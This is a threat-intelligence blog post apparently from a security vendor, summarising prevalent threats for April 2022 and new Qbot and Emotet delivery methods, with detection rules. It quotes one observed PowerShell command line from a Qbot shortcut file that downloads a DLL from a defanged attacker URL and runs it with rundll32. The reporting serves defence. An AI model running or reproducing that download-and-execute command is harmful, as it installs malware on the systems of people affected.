Resources Blog Threat intelligence

Intelligence Insights: May 2022

Raspberry Robin leaves tracks, Gootloader returns, and Qbot adopts new tradecraft.

The Red Canary Team
Originally published . Last modified .

Each month, the Intel team provides Red Canary customers with an analysis of trending, emerging, or otherwise important threats that we’ve encountered in confirmed threat detections, intelligence reporting, and elsewhere over the preceding month. We call this report our “Intelligence Insights” and share a public version of it with the broader infosec community.

Highlights

As we’ve done for the past few months, we again looked at the ten most prevalent threats encountered in the environments that Red Canary monitors. These prevalence rankings are based on the number of unique customer environments in which we observed each threat. Here’s how the numbers shook out for April 2022:

April rankThreat nameThreat DescriptionPercent of customers affected
April rank:

1

Threat name:Threat Description :

Collection of Python classes to construct/manipulate network protocols

Percent of customers affected:

1.5%

April rank:

2

Threat name:Threat Description :

Open source tool that dumps credentials using various techniques

Percent of customers affected:

1.3%

April rank:

3

Threat name:Threat Description :

Worm spread by external drives that leverages Windows Installer to download a malicious DLL

Percent of customers affected:

0.8%

April rank:

4*

Threat name:Threat Description :

Penetration testing tool that integrates functionality from multiple offensive security projects and leverages a native scripting language

Percent of customers affected:

0.7%

April rank:

4*

Threat name:Threat Description :

Banking trojan focused on stealing user data and banking credentials; delivered through phishing, existing Emotet infections, and malicious Windows Installer (MSI) packages

Percent of customers affected:

0.7%

April rank:

4*

Threat name:

Shlayer

Threat Description :

Malware family associated with ad fraud activity through the distribution of adware applications

Percent of customers affected:

0.7%

April rank:

4*

Threat name:Threat Description :

Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as browser updates to trick users into running malicious code

Percent of customers affected:

0.7%

April rank:

4*

Threat name:Threat Description :

Dropper/downloader, often distributed through search engine redirects

Percent of customers affected:

0.7%

April rank:

9

Threat name:

Adload

Threat Description :

Malware that attempts to change the victim's proxy and redirect web browsers for financial gain

Percent of customers affected:

0.5%

April rank:

10*

Threat name:Threat Description :

Open source tool used to identify attack paths and relationships in Active Directory

Percent of customers affected:

0.4%

April rank:

10*

Threat name:Threat Description :

Modular banking trojan that primarily functions as a downloader or dropper of other malware;focused on stealing user data and banking credentials; typically distributed through email

Percent of customers affected:

0.4%

April rank:

10*

Threat name:

Gamarue

Threat Description :

Malware family used as part of a botnet;some variants are worms and frequently spread via infected USB drives

Percent of customers affected:

0.4%

= trending up from previous month
= trending down from previous month
➡ = no change in rank from previous month

*Denotes a tie

**In May 2022, Red Canary began tracking Gootkit as two distinct components, Gootloader and Gootkit. Read our recent blog post for information on the analytic parameters and distinguishing characteristics of each component.

Observations on trending threats

In April, most of our mainstays lingered in the top 10, with one notable newcomer; a relatively new activity cluster we track as Raspberry Robin. Given the volume of Raspberry Robin activity we saw, we published a blog with our research on this threat.

Another curious change is the return of Gootloader, formerly tracked as Gootkit, and the decline of Yellow Cockatoo. As we noted in our April Intelligence Insights, Gootloader and Yellow Cockatoo rely on similar trojanized search engine optimization (SEO) techniques for initial access, and lately they seem to have been taking turns showing up in our detections. While correlation doesn’t equal causation, we’re keeping an eye on what appears to be a pattern between these two prevalent threats.

One final, familiar foe to keep an eye on is our old nemesis Qbot, which still managed to climb up to fourth with a flurry of phishing campaigns at the end of the month.

New Qbot tradecraft

Red Canary recently observed Qbot taking a month off, from the last week of March until April 20, when it resurfaced in our detection data with new observables and new tradecraft.
Though we’ve seen some Qbot operators continue to rely on Microsoft Office documents to deliver malicious droppers during this resurgence, operators have also experimented with at least two new infection vectors.

  • LNK files: In mid-May, multiple customers received phishing emails with malicious ZIP files containing Windows shortcut (LNK) files. If executed, these LNK files run PowerShell commands to download and execute a Qbot DLL payload (see below for a snapshot of a sample command line). This activity has also been reported by threat researchers outside of Red Canary.
“C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe”
iwr hxxps:\\ionbras[.]com[.]br/IrTTog9n5qpa/H.png -OutFile
$env:TEMP\file81.dll;Start-Process rundll32
$env:TEMP\file81.dll,DllInstall

In some of the recent incidents involving LNK files, the Qbot DLL payload was followed quickly by the deployment of Cobalt Strike. We also observed operators using BloodHound, an open source tool used to identify attack paths and relationships in Active Directory, to perform reconnaissance in the compromised environment. The speed at which this activity occurred is concerning, as Qbot, Cobalt Strike, and BloodHound are known ransomware precursors. If you see any Qbot activity, we recommend immediately isolating the machine and starting remediation.

  • MSI Packages: In our April 2022 Intelligence Insights we shared additional details on new Qbot tradecraft observed by threat researchers. For the first time, Qbot operators were observed using Windows Installer (MSI) packages instead of malicious Microsoft Office macros.

The LNK, MSI, and Microsoft Office document delivery methods result in a regsvr32.exe or rundll32.exe process executing the Qbot DLL and injecting into Windows Explorer. This means that despite differences in delivery tradecraft, many of the same set of detection analytics still enable defenders to reliably detect Qbot.


Detection opportunity: Rundll32 executing with uncommon export functions

This detector identifies the Windows DLL Host (rundll32.exe) executing with uncommon export functions. Although LNK file use is new to Qbot, logic that detects suspicious attempts to load DLLs can be leveraged to gain visibility into this behavior, regardless of the specific threat.

process == (rundll32)

&&

process_command_line_includes == (dllinstall, dllunregisterserver)


Emotet experiments with new infection TTPs

Following the disruption of its operations and infrastructure in January 2021, Emotet operators resumed activity in late 2021, experimenting with AppX bundles to deliver the malware. Since then, we’ve also seen the operators use different delivery methods, including Excel 4.0 macros, and most recently, shortcut (LNK) files.

In late April, Red Canary observed Emotet operators experimenting with these LNK files to deliver their malware. After a weekend of what appeared to be testing, operators began using the LNK files, effectively replacing the Excel 4.0 macros observed in other recent campaigns. Red Canary observed attempts to deliver these LNK files via phishing emails containing password-protected ZIP files. If executed, the LNK files run PowerShell commands that download and execute a payload from an obfuscated URL.

As operators seek new opportunities to improve delivery, it’s likely the community will see Emotet delivered via additional, non-Office document macro methods. We’ve already begun to see this trend with other malware families like Qbot (see above), and anticipate that Emotet operators will also continue to evolve.


Detection opportunity: Base64 method calls in PowerShell

This detection opportunity identifies the use of .NET methods to convert text to and from Base64 encoding in PowerShell. Adversaries use this tradecraft to obfuscate attempts to execute malicious code on an endpoint and evade command line-based detections. This detection analytic may also identify malicious behavior associated with other threats, like Cobalt Strike.

process == PowerShell.exe

&&

process_command_line == base64


 

 

Intelligence Insights: June 2022

 

The myth of “soft skills”: Why intelligence teams need strong communicators

 

The Goot cause: Detecting Gootloader and its follow-on activity

 

Raspberry Robin gets the worm early

Subscribe to our blog